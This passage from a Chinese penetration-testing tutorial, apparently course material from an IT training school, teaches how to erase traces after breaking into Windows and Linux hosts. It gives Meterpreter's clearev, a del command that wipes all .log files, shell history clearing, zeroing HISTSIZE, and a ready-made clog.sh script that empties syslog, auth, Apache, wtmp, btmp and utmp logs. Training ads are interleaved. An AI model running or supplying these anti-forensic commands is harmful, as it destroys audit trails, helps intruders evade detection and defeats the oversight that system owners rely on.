仅本地清理,如果目标服务存在日志服务器的话,所有日志还会被保留。这里仅清理系统相关日志,
如果访问了某些服务,比如说通过 apache 服务获得一个 shell,你还需要清理 apache 服务的访问日
志。
Windows 日志清理
Win+R 运行:eventvwr
正常的远程访问在 windows 的时间查看器中可以看到相关记录
meterpreter > clearev
删除系统日志目录下的一些日志文件。
meterpreter > shell
C:\Windows\system32>del %WINDIR%\*.log /a/s/q/f
11.5.2 Linux 日志清理
Linux 可能根据发行版本不同,日志文件名称也有所不同。所以具体清除需要大家先看一下目标操作
系统。
清理历史命令
history -c
使系统不再保存历史命令
vi /etc/profile,找到 HISTSIZE 这个值,修改为 0
删除访问日志
1. 访问失败的日志
删除登录失败记录:echo > /var/log/btmp
2. 访问成功的日志
请加学神 IT 教育官方 QQ 群:869961923 或李老师 QQ:3147296050 领取更多资料请加学神 IT 教育官方 QQ 群:869961923 或乔老师 QQ:2217978235 领取更多资料
删除登录成功记录:echo > /var/log/wtmp (此时执行 last 命令就会发现没有记录)
3. 删除日志记录:echo > /var/log/secure
汇总脚本
[root@xu ~]# cat clog.sh
#!/usr/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
history -c
执行脚本
[root@xu ~]# source clog.sh
执行时注意文件是否有执行权限。而且删除日志一般只有 root 权限才可以。
扫一扫
2362
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
